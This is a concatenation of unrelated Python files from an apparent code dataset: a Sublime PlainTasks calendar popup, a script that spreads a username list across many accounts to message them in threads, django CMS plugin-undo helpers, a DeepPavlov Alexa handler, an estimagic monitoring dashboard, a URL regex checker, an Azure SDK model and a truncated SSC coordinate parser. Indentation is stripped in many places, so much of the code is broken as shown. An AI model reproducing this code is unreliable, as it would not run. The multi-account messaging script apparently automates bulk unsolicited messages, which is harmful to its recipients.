for week in calendar.Calendar().monthdayscalendar(y, m):
row = ['']
for day in week:
link = '<a href="day:{0}-{1}-{2}-{3}-{4}"{5}>{2}</a>'.format(y, m, day, H, M, ' id="today"' if d == day else '')
cell = (' %s' % link if day < 10 else ' %s' % link) if day else ' '
row.append(cell)
table += ' '.join(row + ['<br><br>'])
time = '<a href="time:{0}-{1}-{2}-{3}-{4}">{5}</a>'.format(y, m, d, H, M, date.strftime('%H:%M'))
return content.format(
prev_month=prev_month, next_month=next_month, month=month,
prev_year=prev_year, next_year=next_year, year=year,
time=time, table=table)
def action(self, payload):
msg, stamp = payload.split(':')
def insert(stamp):
self.view.hide_popup()
y, m, d, H, M = (int(i) for i in stamp.split('-'))
self.view.run_command('plain_task_insert_date', {'region': (self.region.a, self.region.b), 'date': (y, m, d, H, M)})
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.region.b + 1))
def generate_months(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
months = ['<br>{5}<a href="year:{0}-{1}-{2}-{3}-{4}">{0}</a><br><br>'.format(y, m, d, H, M, ' ' * 8)]
for i in range(1, 13):
months.append('{6}<a href="calendar:{0}-{1}-{2}-{3}-{4}">{5}</a> '.format(y, i, d, H, M, datetime(y, i, 1, H, M, 0).strftime('%b'), '•' if i == m else ' '))
if i in (4, 8, 12):
months.append('<br><br>')
self.view.update_popup(''.join(months))
def generate_years(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
years = ['<br>']
for i in range(y - 6, y + 6):
years.append('{5}<a href="month:{0}-{1}-{2}-{3}-{4}">{0}</a> '.format(i, m, d, H, M, '•' if i == y else ' '))
if i in (y - 3, y + 1, y + 5):
years.append('<br><br>')
self.view.update_popup(''.join(years))
def generate_time(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
hours = ['<br> Hours:<br><br>']
for i in range(24):
hours.append('{6}{5}<a href="time:{0}-{1}-{2}-{3}-{4}">{3}</a> '.format(y, m, d, i, M, '•' if i == H else ' ', ' ' if i < 10 else ''))
if i in (7, 15, 23):
hours.append('<br><br>')
minutes = ['<br> Minutes:<br><br>']
for i in range(60):
minutes.append('{6}{5}<a href="time:{0}-{1}-{2}-{3}-{4}">{4}</a> '.format(y, m, d, H, i, '•' if i == M else ' ', ' ' if i < 10 else ''))
if i in (9, 19, 29, 39, 49, 59):
minutes.append('<br><br>')
confirm = ['<br> <a href="calendar:{0}-{1}-{2}-{3}-{4}">Confirm: {5}</a> <br><br>'.format(y, m, d, H, M, datetime(y, m, d, H, M, 0).strftime('%H:%M'))]
self.view.update_popup(''.join(hours + minutes + confirm))
def calendar(stamp):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
if m == 2 and d > 28:
d = 28
elif d == 31 and m in (4, 6, 9, 11):
d = 30
self.view.update_popup(self.generate_calendar(date=datetime(y, m, d, H, M, 0)))
def shift(stamp, month=0, year=0):
y, m, d, H, M = (int(i) for i in stamp.split('-'))
date = datetime(y, m, d, H, M, 0) + relativedelta(months=month, years=year)
self.view.update_popup(self.generate_calendar(date))
case = {
'day': insert,
'month': generate_months,
'year': generate_years,
'time': generate_time,
'calendar': calendar,
'prev_month': lambda s=stamp: shift(s, month=-1),
'next_month': lambda s=stamp: shift(s, month=1),
'prev_year': lambda s=stamp: shift(s, year=-1),
'next_year': lambda s=stamp: shift(s, year=1)
}
self.view.update_popup('Loading...')
case[msg](stamp)
class PlainTasksRemain(PlainTasksViewEventListener):
def __init__(self, view):
self.view = view
self.phantom_set = sublime.PhantomSet(view, 'plain_tasks_remain_time')
self.view.settings().add_on_change('plain_tasks_remain_time_phantoms', self.check_setting)
self.phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
def check_setting(self):
'''add_on_change is issued on change of any setting in settings object'''
new_value = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
if self.phantoms == new_value:
return
self.phantoms = new_value
self.update()
def update(self):
self.phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
if not self.phantoms:
self.phantom_set.update([])
return
remain_format = self.view.settings().get('due_remain_format', '{time} remaining')
overdue_format = self.view.settings().get('due_overdue_format', '{time} overdue')
upd = []
for point, content in self.phantoms:
upd.append(sublime.Phantom(
sublime.Region(point),
(overdue_format if '-' in content else remain_format).format(time=content.lstrip('-') or 'a little bit'),
sublime.LAYOUT_BELOW))
self.phantom_set.update(upd)
def plugin_unloaded():
for window in sublime.windows():
for view in window.views():
view.settings().clear_on_change('plain_tasks_remain_time_phantoms')
| nilq/baby-python | python |
import json
from src import util
from threading import Thread
with open('infos/accounts.json') as f:
    accounts = json.load(f)
with open('infos/config.json') as f:
    config = json.load(f)
with open('infos/usernames.txt', 'r') as f:
usernames = [line.strip() for line in f]
usernamesForAccount = config["usernamesForAccount"]
capacity = len(accounts) * usernamesForAccount
toSent = len(usernames)
if capacity < toSent:
    print('Problem: we have only ' + str(len(accounts)) + ' accounts')
    print('Problem: we can message at most ' + str(len(accounts) * usernamesForAccount) + ' usernames')
    print('Problem: we want to message ' + str(len(usernames)) + ' usernames')
    print('Problem: ' + str(
        len(usernames) - (len(accounts) * usernamesForAccount)) + ' usernames would be left without a message')
    exit()
buttons = []
threads = []
timewait = 5
for account in accounts:
    timewait += 5  # give each successive account a larger timewait (passed to the worker)
if not account.get('password'):
account['password'] = config["defaultAccountPassword"]
if not usernames:
break
usernamesForAccountList = list()
for i in range(usernamesForAccount):
if not usernames:
break
usernamesForAccountList.append(usernames.pop())
# util.send_messages(account, usernamesForAccountList)
# util.send_groupmessages(account, usernamesForAccountList)
    t = Thread(target=util.send_messages,
               args=(account, usernamesForAccountList, timewait,))
    threads.append(t)
    buttons.append(False)  # reserve one placeholder slot per thread
for t in threads:
print(t.name)
t.start()
for t in threads:
print(t.name)
t.join()
| nilq/baby-python | python |
from collections import defaultdict
from datetime import timedelta
from django.contrib.sites.models import Site
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import signals
from django.utils import timezone
from cms.models import CMSPlugin
from cms.utils import get_language_from_request
from .compat import CMS_GTE_36
from .utils import get_plugin_fields, get_plugin_model
def delete_plugins(placeholder, plugin_ids, nested=True):
# With plugins, we can't do queryset.delete()
# because this would trigger a bunch of internal
# cms signals.
# Instead, delete each plugin individually and turn off
# position reordering using the _no_reorder trick.
plugins = (
placeholder
.cmsplugin_set
.filter(pk__in=plugin_ids)
.order_by('-depth')
.select_related()
)
bound_plugins = get_bound_plugins(plugins)
for plugin in bound_plugins:
plugin._no_reorder = True
if hasattr(plugin, 'cmsplugin_ptr'):
plugin.cmsplugin_ptr._no_reorder = True
# When the nested option is False
# avoid queries by preventing the cms from
# recalculating the child counter of this plugin's
# parent (for which there's none).
plugin.delete(no_mp=not nested)
def get_bound_plugins(plugins):
    """Yield each plugin downcast to its concrete (bound) model instance;
    plugins whose concrete instance cannot be fetched are yielded as-is.
    """
    plugin_types_map = defaultdict(list)
    plugin_lookup = {}
    # make a map of plugin types, needed later for downcasting
for plugin in plugins:
plugin_types_map[plugin.plugin_type].append(plugin.pk)
for plugin_type, pks in plugin_types_map.items():
plugin_model = get_plugin_model(plugin_type)
plugin_queryset = plugin_model.objects.filter(pk__in=pks)
# put them in a map so we can replace the base CMSPlugins with their
# downcasted versions
for instance in plugin_queryset.iterator():
plugin_lookup[instance.pk] = instance
for plugin in plugins:
yield plugin_lookup.get(plugin.pk, plugin)
def get_plugin_data(plugin, only_meta=False):
if only_meta:
custom_data = None
else:
plugin_fields = get_plugin_fields(plugin.plugin_type)
_plugin_data = serializers.serialize('python', (plugin,), fields=plugin_fields)[0]
custom_data = _plugin_data['fields']
plugin_data = {
'pk': plugin.pk,
'creation_date': plugin.creation_date,
'position': plugin.position,
'plugin_type': plugin.plugin_type,
'parent_id': plugin.parent_id,
'data': custom_data,
}
return plugin_data
def get_active_operation(operations):
operations = operations.filter(is_applied=True)
try:
operation = operations.latest()
except ObjectDoesNotExist:
operation = None
return operation
def get_inactive_operation(operations, active_operation=None):
active_operation = active_operation or get_active_operation(operations)
if active_operation:
date_created = active_operation.date_created
operations = operations.filter(date_created__gt=date_created)
try:
operation = operations.filter(is_applied=False).earliest()
except ObjectDoesNotExist:
operation = None
return operation
def get_operations_from_request(request, path=None, language=None):
from .models import PlaceholderOperation
    if not language:
        language = get_language_from_request(request)
origin = path or request.path
# This is controversial :/
# By design, we don't let undo/redo span longer than a day.
# To be decided if/how this should be configurable.
date = timezone.now() - timedelta(days=1)
site = Site.objects.get_current(request)
queryset = PlaceholderOperation.objects.filter(
site=site,
origin=origin,
language=language,
user=request.user,
user_session_key=request.session.session_key,
date_created__gt=date,
is_archived=False,
)
return queryset
def disable_cms_plugin_signals(func):
# Skip this if we are using django CMS >= 3.6
if CMS_GTE_36:
return func
from cms.signals import (
post_delete_plugins, pre_delete_plugins, pre_save_plugins,
)
# The wrapped function NEEDS to set _no_reorder on any bound plugin instance
# otherwise this does nothing because it only disconnects signals
# for the cms.CMSPlugin class, not its subclasses
plugin_signals = (
(signals.pre_delete, pre_delete_plugins, 'cms_pre_delete_plugin', CMSPlugin),
(signals.pre_save, pre_save_plugins, 'cms_pre_save_plugin', CMSPlugin),
(signals.post_delete, post_delete_plugins, 'cms_post_delete_plugin', CMSPlugin),
)
def wrapper(*args, **kwargs):
for signal, handler, dispatch_id, model_class in plugin_signals:
signal.disconnect(
handler,
sender=model_class,
dispatch_uid=dispatch_id
)
signal.disconnect(handler, sender=model_class)
func(*args, **kwargs)
for signal, handler, dispatch_id, model_class in plugin_signals:
signal.connect(
handler,
sender=model_class,
dispatch_uid=dispatch_id
)
return wrapper
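# Hedged usage sketch (illustration only; the function name is a stand-in).
# On django CMS >= 3.6 the decorator is a no-op; on older versions the wrapped
# function must still set `_no_reorder` on any bound plugin it touches, as
# noted above:
#
#     @disable_cms_plugin_signals
#     def restore_plugins(placeholder, plugin_data):
#         ...  # mutate plugins without triggering cms reorder signals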
| nilq/baby-python | python |
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Timer
from copy import deepcopy
from typing import Optional
from deeppavlov.agents.default_agent.default_agent import DefaultAgent
from deeppavlov.core.agent.rich_content import RichMessage
from deeppavlov.core.common.log import get_logger
log = get_logger(__name__)
class Conversation:
"""Contains agent (if multi-instanced), receives requests, generates responses.
Args:
config: Alexa skill configuration settings.
agent: DeepPavlov Agent instance.
conversation_key: Alexa conversation ID.
self_destruct_callback: Conversation instance deletion callback function.
Attributes:
config: Alexa skill configuration settings.
agent: Alexa skill agent.
key: Alexa conversation ID.
stateful: Stateful mode flag.
timer: Conversation self-destruct timer.
handled_requests: Mapping of Alexa requests types to requests handlers.
response_template: Alexa response template.
"""
def __init__(self, config: dict, agent: DefaultAgent, conversation_key: str,
self_destruct_callback: callable) -> None:
self.config = config
self.agent = agent
self.key = conversation_key
self.self_destruct_callback = self_destruct_callback
self.stateful: bool = self.config['stateful']
self.timer: Optional[Timer] = None
self.handled_requests = {
'LaunchRequest': self._handle_launch,
'IntentRequest': self._handle_intent,
'SessionEndedRequest': self._handle_end,
'_unsupported': self._handle_unsupported
}
self.response_template = {
'version': '1.0',
'sessionAttributes': {
'sessionId': None
}
}
self._start_timer()
def _start_timer(self) -> None:
"""Initiates self-destruct timer."""
self.timer = Timer(self.config['conversation_lifetime'], self.self_destruct_callback)
self.timer.start()
def _rearm_self_destruct(self) -> None:
"""Rearms self-destruct timer."""
self.timer.cancel()
self._start_timer()
def handle_request(self, request: dict) -> dict:
"""Routes Alexa requests to appropriate handlers.
Args:
request: Alexa request.
Returns:
response: Response conforming Alexa response specification.
"""
request_type = request['request']['type']
request_id = request['request']['requestId']
log.debug(f'Received request. Type: {request_type}, id: {request_id}')
if request_type in self.handled_requests.keys():
response: dict = self.handled_requests[request_type](request)
else:
response: dict = self.handled_requests['_unsupported'](request)
log.warning(f'Unsupported request type: {request_type}, request id: {request_id}')
self._rearm_self_destruct()
return response
def _act(self, utterance: str) -> list:
"""Infers DeepPavlov agent with raw user input extracted from Alexa request.
Args:
utterance: Raw user input extracted from Alexa request.
Returns:
response: DeepPavlov agent response.
"""
if self.stateful:
utterance = [[utterance], [self.key]]
else:
utterance = [[utterance]]
agent_response: list = self.agent(*utterance)
return agent_response
def _generate_response(self, response: dict, request: dict) -> dict:
"""Populates generated response with additional data conforming Alexa response specification.
Args:
response: Raw user input extracted from Alexa request.
request: Alexa request.
Returns:
response: Response conforming Alexa response specification.
"""
response_template = deepcopy(self.response_template)
response_template['sessionAttributes']['sessionId'] = request['session']['sessionId']
for key, value in response_template.items():
if key not in response.keys():
response[key] = value
return response
def _handle_intent(self, request: dict) -> dict:
"""Handles IntentRequest Alexa request.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
intent_name = self.config['intent_name']
slot_name = self.config['slot_name']
request_id = request['request']['requestId']
request_intent: dict = request['request']['intent']
if intent_name != request_intent['name']:
log.error(f"Wrong intent name received: {request_intent['name']} in request {request_id}")
return {'error': 'wrong intent name'}
if slot_name not in request_intent['slots'].keys():
log.error(f'No slot named {slot_name} found in request {request_id}')
return {'error': 'no slot found'}
utterance = request_intent['slots'][slot_name]['value']
agent_response = self._act(utterance)
if not agent_response:
log.error(f'Some error during response generation for request {request_id}')
return {'error': 'error during response generation'}
prediction: RichMessage = agent_response[0]
prediction: list = prediction.alexa()
if not prediction:
log.error(f'Some error during response generation for request {request_id}')
return {'error': 'error during response generation'}
response = self._generate_response(prediction[0], request)
return response
def _handle_launch(self, request: dict) -> dict:
"""Handles LaunchRequest Alexa request.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
response = {
'response': {
'shouldEndSession': False,
'outputSpeech': {
'type': 'PlainText',
'text': self.config['start_message']
},
'card': {
'type': 'Simple',
'content': self.config['start_message']
}
}
}
response = self._generate_response(response, request)
return response
def _handle_end(self, request: dict) -> dict:
"""Handles SessionEndedRequest Alexa request and deletes Conversation instance.
Args:
request: Alexa request.
Returns:
response: Dummy empty response dict.
"""
response = {}
self.self_destruct_callback()
return response
def _handle_unsupported(self, request: dict) -> dict:
"""Handles all unsupported types of Alexa requests. Returns standard message.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
response = {
'response': {
'shouldEndSession': False,
'outputSpeech': {
'type': 'PlainText',
'text': self.config['unsupported_message']
},
'card': {
'type': 'Simple',
'content': self.config['unsupported_message']
}
}
}
response = self._generate_response(response, request)
return response
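# Hedged illustration (not part of the library): route a minimal LaunchRequest
# through a Conversation with a stub agent. Every config value below is made
# up for the example; a real skill passes a DeepPavlov DefaultAgent instead.
if __name__ == '__main__':
    class _StubAgent:
        def __call__(self, *batch):
            return []
    _config = {'stateful': False, 'conversation_lifetime': 60,
               'intent_name': 'AskDeepPavlov', 'slot_name': 'raw_input',
               'start_message': 'Hi, ask me something!',
               'unsupported_message': 'Sorry, I cannot handle that.'}
    conv = Conversation(_config, _StubAgent(), 'conversation-key',
                        self_destruct_callback=lambda: None)
    launch = {'request': {'type': 'LaunchRequest', 'requestId': 'req-1'},
              'session': {'sessionId': 'session-1'}}
    print(conv.handle_request(launch))
    conv.timer.cancel()  # stop the rearmed self-destruct timer so the script can exit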
| nilq/baby-python | python |
"""Show the development of one optimization's criterion and parameters over time."""
from functools import partial
from pathlib import Path
import numpy as np
import pandas as pd
from bokeh.layouts import Column
from bokeh.layouts import Row
from bokeh.models import ColumnDataSource
from bokeh.models import Panel
from bokeh.models import Tabs
from bokeh.models import Toggle
from estimagic.dashboard.monitoring_callbacks import activation_callback
from estimagic.dashboard.monitoring_callbacks import logscale_callback
from estimagic.dashboard.plot_functions import plot_time_series
from estimagic.logging.database_utilities import load_database
from estimagic.logging.database_utilities import read_last_rows
from estimagic.logging.read_log import read_start_params
from jinja2 import Environment
from jinja2 import FileSystemLoader
def monitoring_app(
doc,
database_name,
session_data,
updating_options,
start_immediately,
):
"""Create plots showing the development of the criterion and parameters.
Args:
doc (bokeh.Document): Argument required by bokeh.
database_name (str): Short and unique name of the database.
session_data (dict): Infos to be passed between and within apps.
Keys of this app's entry are:
- last_retrieved (int): last iteration currently in the ColumnDataSource.
- database_path (str or pathlib.Path)
- callbacks (dict): dictionary to be populated with callbacks.
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
"""
# style the Document
template_folder = Path(__file__).resolve().parent
# conversion to string from pathlib Path is necessary for FileSystemLoader
env = Environment(loader=FileSystemLoader(str(template_folder)))
doc.template = env.get_template("index.html")
# process inputs
database = load_database(path=session_data["database_path"])
start_point = _calculate_start_point(database, updating_options)
session_data["last_retrieved"] = start_point
start_params = read_start_params(path_or_database=database)
start_params["id"] = _create_id_column(start_params)
group_to_param_ids = _map_group_to_other_column(start_params, "id")
group_to_param_names = _map_group_to_other_column(start_params, "name")
criterion_history, params_history = _create_cds_for_monitoring_app(
group_to_param_ids
)
# create elements
button_row = _create_button_row(
doc=doc,
database=database,
session_data=session_data,
start_params=start_params,
updating_options=updating_options,
)
monitoring_plots = _create_initial_convergence_plots(
criterion_history=criterion_history,
params_history=params_history,
group_to_param_ids=group_to_param_ids,
group_to_param_names=group_to_param_names,
)
# add elements to bokeh Document
grid = Column(children=[button_row, *monitoring_plots], sizing_mode="stretch_width")
convergence_tab = Panel(child=grid, title="Convergence Tab")
tabs = Tabs(tabs=[convergence_tab])
doc.add_root(tabs)
if start_immediately:
activation_button = doc.get_model_by_name("activation_button")
activation_button.active = True
def _create_id_column(df):
"""Create a column that gives the position for plotted parameters and is None else.
Args:
df (pd.DataFrame)
Returns:
ids (pd.Series): integer position in the DataFrame unless the group was
None, False, np.nan or an empty string.
"""
ids = pd.Series(range(len(df)), dtype=object, index=df.index)
ids[df["group"].isin([None, False, np.nan, ""])] = None
return ids.astype(str)
def _map_group_to_other_column(params, column_name):
"""Map the group name to lists of one column's values of the group's parameters.
Args:
params (pd.DataFrame): Includes the "group" and "id" columns.
column_name (str): name of the column for which to return the parameter values.
Returns:
group_to_values (dict): Keys are the values of the "group" column.
The values are lists of parameter values of the parameters belonging
to the particular group.
"""
to_plot = params[~params["group"].isin([None, False, np.nan, ""])]
group_to_indices = to_plot.groupby("group").groups
group_to_values = {}
for group, loc in group_to_indices.items():
group_to_values[group] = to_plot[column_name].loc[loc].tolist()
return group_to_values
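# Hedged illustration (not part of the app; the toy params frame is made up
# for the example): how the two helpers above tag and group parameters.
if __name__ == '__main__':
    _params = pd.DataFrame({"group": ["g1", "g1", None], "name": ["a", "b", "c"]})
    _params["id"] = _create_id_column(_params)  # -> ['0', '1', 'None']
    print(_map_group_to_other_column(_params, "name"))  # -> {'g1': ['a', 'b']}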
def _create_cds_for_monitoring_app(group_to_param_ids):
"""Create the ColumnDataSources for saving the criterion and parameter values.
They will be periodically updated from the database.
There is a ColumnDataSource for all parameters and one for the criterion value.
The "x" column is called "iteration".
Args:
group_to_param_ids (dict): Keys are the groups to be plotted. The values are
the ids of the parameters belonging to the particular group.
Returns:
criterion_history (bokeh.ColumnDataSource)
params_history (bokeh.ColumnDataSource)
"""
crit_data = {"iteration": [], "criterion": []}
criterion_history = ColumnDataSource(crit_data, name="criterion_history_cds")
param_ids = []
for id_list in group_to_param_ids.values():
param_ids += id_list
params_data = {id_: [] for id_ in param_ids + ["iteration"]}
params_history = ColumnDataSource(params_data, name="params_history_cds")
return criterion_history, params_history
def _calculate_start_point(database, updating_options):
"""Calculate the starting point.
Args:
database (sqlalchemy.MetaData): Bound metadata object.
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
Returns:
start_point (int): iteration from which to start the dashboard.
"""
if updating_options["jump"]:
last_entry = read_last_rows(
database=database,
table_name="optimization_iterations",
n_rows=1,
return_type="list_of_dicts",
)
nr_of_entries = last_entry[0]["rowid"]
nr_to_go_back = updating_options["rollover"] * updating_options["stride"]
start_point = max(0, nr_of_entries - nr_to_go_back)
else:
start_point = 0
return start_point
def _create_initial_convergence_plots(
criterion_history,
params_history,
group_to_param_ids,
group_to_param_names,
):
"""Create the initial convergence plots.
Args:
criterion_history (bokeh ColumnDataSource)
params_history (bokeh ColumnDataSource)
group_to_param_ids (dict): Keys are the groups to be plotted. Values are the
ids of the parameters belonging to the respective group.
group_to_param_names (dict): Keys are the groups to be plotted. Values are the
names of the parameters belonging to the respective group.
Returns:
convergence_plots (list): List of bokeh Row elements, each containing one
convergence plot.
"""
param_plots = []
for group, param_ids in group_to_param_ids.items():
param_names = group_to_param_names[group]
param_group_plot = plot_time_series(
data=params_history,
y_keys=param_ids,
y_names=param_names,
x_name="iteration",
title=str(group),
)
param_plots.append(param_group_plot)
arranged_param_plots = [Row(plot) for plot in param_plots]
linear_criterion_plot = plot_time_series(
data=criterion_history,
x_name="iteration",
y_keys=["criterion"],
y_names=["criterion"],
title="Criterion",
name="linear_criterion_plot",
logscale=False,
)
log_criterion_plot = plot_time_series(
data=criterion_history,
x_name="iteration",
y_keys=["criterion"],
y_names=["criterion"],
title="Criterion",
name="log_criterion_plot",
logscale=True,
)
log_criterion_plot.visible = False
plot_list = [
Row(linear_criterion_plot),
Row(log_criterion_plot),
] + arranged_param_plots
return plot_list
def _create_button_row(
doc,
database,
session_data,
start_params,
updating_options,
):
"""Create a row with two buttons, one for (re)starting and one for scale switching.
Args:
doc (bokeh.Document)
database (sqlalchemy.MetaData): Bound metadata object.
session_data (dict): dictionary with the last retrieved rowid
start_params (pd.DataFrame): See :ref:`params`
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
Returns:
bokeh.layouts.Row
"""
# (Re)start convergence plot button
activation_button = Toggle(
active=False,
label="Start Updating",
button_type="danger",
width=200,
height=30,
name="activation_button",
)
partialed_activation_callback = partial(
activation_callback,
button=activation_button,
doc=doc,
database=database,
session_data=session_data,
tables=["criterion_history", "params_history"],
start_params=start_params,
updating_options=updating_options,
)
activation_button.on_change("active", partialed_activation_callback)
# switch between linear and logscale button
logscale_button = Toggle(
active=False,
label="Show criterion plot on a logarithmic scale",
button_type="default",
width=200,
height=30,
name="logscale_button",
)
partialed_logscale_callback = partial(
logscale_callback,
button=logscale_button,
doc=doc,
)
logscale_button.on_change("active", partialed_logscale_callback)
button_row = Row(children=[activation_button, logscale_button], name="button_row")
return button_row
| nilq/baby-python | python |
import sys
import re
def check_url(url):
    # (?::(\d+))? captures the port digits only; the original pattern captured
    # the leading ':' as part of the port. Hostnames may also contain hyphens.
    patt = r'^(\w+)://([0-9a-z.-]+)(?::(\d+))?(?:/([0-9a-z_/.]+)?(\S+)?)?$'
    m = re.match(patt, url, re.I)
    if m:
        schema = m.group(1)
        port = m.group(3)
        if port is None and schema == 'http':
            port = 80
        return {'schema': schema, 'hostname': m.group(2), 'port': port, 'path': m.group(4), 'qs': m.group(5)}
    else:
        return None
if __name__ == '__main__':
    # e.g. `python check_url.py http://example.com:8080/index.html?q=1`
    print(check_url(sys.argv[1]))
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CognitiveServicesAccountCreateParameters(Model):
"""The parameters to provide for the account.
All required parameters must be populated in order to send to Azure.
:param sku: Required. Required. Gets or sets the SKU of the resource.
:type sku: ~azure.mgmt.cognitiveservices.models.Sku
:param kind: Required. Required. Gets or sets the Kind of the resource.
Possible values include: 'Bing.Autosuggest.v7', 'Bing.CustomSearch',
'Bing.Search.v7', 'Bing.Speech', 'Bing.SpellCheck.v7', 'ComputerVision',
'ContentModerator', 'CustomSpeech', 'CustomVision.Prediction',
'CustomVision.Training', 'Emotion', 'Face', 'LUIS', 'QnAMaker',
'SpeakerRecognition', 'SpeechTranslation', 'TextAnalytics',
'TextTranslation', 'WebLM'
:type kind: str or ~azure.mgmt.cognitiveservices.models.Kind
:param location: Required. Required. Gets or sets the location of the
resource. This will be one of the supported and registered Azure Geo
Regions (e.g. West US, East US, Southeast Asia, etc.). The geo region of a
resource cannot be changed once it is created, but if an identical geo
region is specified on update the request will succeed.
:type location: str
:param tags: Gets or sets a list of key value pairs that describe the
resource. These tags can be used in viewing and grouping this resource
(across resource groups). A maximum of 15 tags can be provided for a
resource. Each tag must have a key no greater than 128 characters and
value no greater than 256 characters.
:type tags: dict[str, str]
:param properties: Required. Must exist in the request. Must be an empty
object. Must not be null.
:type properties: object
"""
_validation = {
'sku': {'required': True},
'kind': {'required': True},
'location': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'sku': {'key': 'sku', 'type': 'Sku'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(self, *, sku, kind, location: str, properties, tags=None, **kwargs) -> None:
super(CognitiveServicesAccountCreateParameters, self).__init__(**kwargs)
self.sku = sku
self.kind = kind
self.location = location
self.tags = tags
self.properties = properties
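# Hedged usage sketch (illustration only; the SKU name, kind, and location
# values below are made up, and `Sku` is the sibling model from this package):
#
#     params = CognitiveServicesAccountCreateParameters(
#         sku=Sku(name='S0'), kind='TextAnalytics',
#         location='westus', properties={})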
| nilq/baby-python | python |
#! /usr/bin/python3
#-*- coding: utf-8 -*-
from __future__ import print_function
import datetime
import sys
import re
class SscSite:
def __init__(self, **kwargs):
self.domes = kwargs['domes']
self.site_name = kwargs['site_name']
self.id = kwargs['id']
self.data_start = kwargs['data_start']
self.data_stop = kwargs['data_stop']
self.ref_epoch = kwargs['ref_epoch']
self.soln = int(kwargs['soln'])
self.x = float(kwargs['x'])
self.sx = float(kwargs['sx']) if 'sx' in kwargs else 0e0
self.y = float(kwargs['y'])
self.sx = float(kwargs['sy']) if 'sy' in kwargs else 0e0
self.z = float(kwargs['z'])
self.sz = float(kwargs['sz']) if 'sz' in kwargs else 0e0
self.vx = float(kwargs['vx'])
self.svx = float(kwargs['svx']) if 'svx' in kwargs else 0e0
self.vy = float(kwargs['vy'])
self.svx = float(kwargs['svy']) if 'svy' in kwargs else 0e0
self.vz = float(kwargs['vz'])
self.svz = float(kwargs['svz']) if 'svz' in kwargs else 0e0
def extrapolate(self, dt):
# print('\t>> extrapolating from SOLN={:}'.format(self.soln))
days = float((dt-self.ref_epoch).days)
years = days / 365.25e0
return self.x + self.vx*years, self.y + self.vy*years, self.z + self.vz*years
def parse_ssc_date(dstr, default=datetime.datetime.min):
if dstr.strip() == '00:000:00000':
return default
flds = dstr.split(':')
return datetime.datetime.strptime(':'.join(flds[0:2]), '%y:%j') + datetime.timedelta(seconds=int(flds[2]))
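# Hedged example (illustration only; all values are made up). The module is
# pure stdlib, so this runs standalone:
if __name__ == '__main__':
    # SSC epochs are YY:DOY:SECONDS-of-day
    print(parse_ssc_date('21:001:43200'))  # -> 2021-01-01 12:00:00
    _site = SscSite(domes='12345M001', site_name='EXMP', id='EXMP', soln=1,
                    data_start=datetime.datetime(2010, 1, 1),
                    data_stop=datetime.datetime(2030, 1, 1),
                    ref_epoch=datetime.datetime(2010, 1, 1),
                    x=4000000.0, y=2000000.0, z=4000000.0,
                    vx=0.01, vy=-0.02, vz=0.005)
    # ten years of linear velocity applied to x, y, z
    print(_site.extrapolate(datetime.datetime(2020, 1, 1)))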
def min_of_ssc_records_of_same_site(ssc_recs):
rec = ssc_recs[0]
for i in ssc_recs[1:]:
if i.soln < rec.soln:
rec = i
return rec
def max_of_ssc_records_of_same_site(ssc_recs):
rec = ssc_recs[0]
for i in ssc_recs[1:]:
if i.soln > rec.soln:
rec = i
return rec
def match_site_in_rec_list(site, list):
for s in list:
if s.site_name == site.site_name:
return True
return False
def unique_records(ssc_records, dt):
ssc_unique_records = []
for site in ssc_records:
if not match_site_in_rec_list(site, ssc_unique_records):
# print('>> processing site {:}'.format(site.id))
site_recs = [s for s in ssc_records if s.site_name == site.site_name]
# print('\t>> num of entries = {:}'.format(len(site_recs)))
rec = None
max_date = datetime.datetime.min
min_date = datetime.datetime.max
for s in site_recs:
if s.data_start < min_date: min_date = s.data_start
if s.data_stop > max_date: max_date = s.data_stop
if dt >= s.data_start and dt <= s.data_stop:
ssc_unique_records.append(s)
rec = s
# print('\t>> matched interval! breaking ....')
break
if rec is None:
if dt < min_date:
ssc_unique_records.append(min_of_ssc_records_of_same_site(site_recs))
# print('\t>> interval unmatched, adding min soln ...')
elif dt > max_date:
ssc_unique_records.append(max_of_ssc_records_of_same_site(site_recs))
# print('\t>> interval unmatched, adding max soln ...')
else:
## probably no dt is between intervals ....
print('[WRNNG] No solution interval contains epoch {:} for site {:}_{:}; site skipped, don\'t know what to do!'.format(dt.strftime('%Y-%jT%H:%M'), site.id, site.domes), file=sys.stderr)
return ssc_unique_records
def parse_ssc(ssc_fn, station_list=[], dt=None):
ssc_records = []
with open(ssc_fn, 'r') as fin:
line = fin.readline()
while line and not line.lstrip().startswith('DOMES NB. SITE NAME TECH. ID.'):
line = fin.readline()
## 2 header lines
if not line:
errmsg = '[ERROR] Failed to find header line in SSC file {:}'.format(ssc_fn)
print(errmsg, file=sys.stderr)
raise RuntimeError(errmsg)
